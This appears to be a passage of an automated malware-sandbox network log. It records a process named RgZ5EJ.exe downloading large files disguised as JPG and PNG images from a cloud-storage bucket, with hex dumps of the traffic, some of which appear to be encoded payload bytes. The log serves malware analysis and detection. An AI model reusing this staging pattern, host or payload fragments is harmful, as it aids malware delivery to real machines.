2025-01-13 12:55:20 UTC	4096	IN	Data Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a Data Ascii: yv#{wofKlY%'\JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u`vRP;\Xf b$m-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
2025-01-13 12:55:20 UTC	4096	IN	Data Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5 Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
2025-01-13 12:55:20 UTC	4096	IN	Data Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81 Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-C.G!"#$g()+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{\|
2025-01-13 12:55:20 UTC	4096	IN	Data Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	50014	118.178.60.9	443	7228	C:\Users\user\Documents\RgZ5EJ.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:55:22 UTC	115	OUT	GET /FOM-51.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-13 12:55:22 UTC	548	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 12:55:22 GMT Content-Type: image/jpeg Content-Length: 4859125 Connection: close x-oss-request-id: 67850D3AFDF0783938A5548A Accept-Ranges: bytes ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02" Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9060732723227198118 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 7myj7qf5scgQWa71cKKMAg== x-oss-server-time: 14
2025-01-13 12:55:22 UTC	3548	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-13 12:55:22 UTC	4096	IN	Data Raw: 42 cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66 Data Ascii: B;K5Aat=BGjD=\|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@\|-$XW9!][b-I^pHcf
2025-01-13 12:55:22 UTC	4096	IN	Data Raw: 55 c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14 Data Ascii: Uxd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
2025-01-13 12:55:22 UTC	4096	IN	Data Raw: 45 e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c Data Ascii: E^h0X<LU)dF]:ywSDJu7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD\|T#c-Cpk^0ncLhz43h\`/k?_wE\
2025-01-13 12:55:22 UTC	4096	IN	Data Raw: c3 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9 Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;\|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
2025-01-13 12:55:22 UTC	4096	IN	Data Raw: 2c 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7 Data Ascii: ,M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ\|fan?adq~\|
2025-01-13 12:55:22 UTC	4096	IN	Data Raw: 94 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66 Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
2025-01-13 12:55:22 UTC	4096	IN	Data Raw: 7e 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca Data Ascii: ~07,7OL\|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/
2025-01-13 12:55:22 UTC	4096	IN	Data Raw: e7 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06 Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*
2025-01-13 12:55:22 UTC	4096	IN	Data Raw: be d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]\|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	50015	118.178.60.9	443	7228	C:\Users\user\Documents\RgZ5EJ.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:55:35 UTC	115	OUT	GET /FOM-52.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-13 12:55:35 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 12:55:35 GMT Content-Type: image/jpeg Content-Length: 5062442 Connection: close x-oss-request-id: 67850D47FE87B7323934E0D6 Accept-Ranges: bytes ETag: "70C21DA900796B279A09040B00953E40" Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 360383310743409046 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: cMIdqQB5ayeaCQQLAJU+QA== x-oss-server-time: 24
2025-01-13 12:55:35 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-13 12:55:35 UTC	4096	IN	Data Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>\|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V\|
2025-01-13 12:55:35 UTC	4096	IN	Data Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi\|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
2025-01-13 12:55:35 UTC	4096	IN	Data Raw: f5 f5 f3 fb ff fd f3 f5 f7 f5 f3 eb ef ed d3 d5 d7 d5 d3 dd bf a7 d3 d5 d3 d5 d3 2d 2f 2d 33 37 37 75 32 3d 3f 2d 33 35 27 35 33 2d 2f 3d 53 55 47 55 53 5d 5f 5d 53 45 57 55 53 11 b2 50 73 3f 77 75 73 f1 8d 4d 73 a9 77 75 73 6d 3f 17 53 b5 56 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 35 37 35 33 3d 0f 47 33 15 2c 35 33 2d 2f 2d d3 d5 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5 f7 f5 f3 fd ff fd f3 f5 f7 f5 f3 4d c9 97 d3 95 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 2d 1f 00 33 51 37 35 33 3d 3f 3d 33 35 37 35 33 2d 2f 2d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 43 1b 08 0b 01 77 75 73 1e cd 7c 73 75 67 75 73 6d 6f 6d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 15 37 35 53 13 4d 59 52 41 56 35 33 e5 a6 2d d3 d5 07 d4 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 Data Ascii: -/-377u2=?-35'53-/=SUGUS]_]SEWUSPs?wusMswusm?SVUS]_]SUWUS-/-35753=G3,53-/-M-3Q753=?=35753-/-SUWUS]_]SUWUSCwus\|sugusmomSUWUS]_]SUWUS-/-375SMYRAV53-
2025-01-13 12:55:35 UTC	4096	IN	Data Raw: d1 7d e2 3a fb d9 7f 2d 5c 08 7e 89 cb e9 3a 78 19 d3 d3 54 a8 dd 3b c0 68 9c d3 da f6 a0 3f b8 09 85 13 9c b2 89 02 f5 bb 84 84 22 99 a1 5c eb db e4 e4 52 d7 a8 84 57 57 3d d3 53 dd 2c 15 fe 48 f8 17 59 7b 94 02 a5 74 75 f2 ab 6b 6d 53 55 5c 97 a4 8d b7 85 fd 1e 57 33 82 c4 fc f5 5b b3 98 02 7d b4 7b 18 33 b8 53 11 3f c4 e7 e4 99 d5 df 7a 12 6b f1 4b ab 5b 8f 5c 2e 0b c5 75 fb 0d d3 04 7a 6d a5 1d 7f b1 af 41 46 fd 97 72 44 70 9c 6c f0 98 c6 38 c7 3a 4f 9d 67 53 5d 8b 18 45 fa 27 78 f9 2c e7 bf e3 1a 15 03 e6 d9 54 24 d6 03 bf c8 c3 24 e4 ff 0d e1 62 93 bb 32 d3 1d e0 a9 69 56 22 dc 79 04 9f f6 79 91 f4 ce 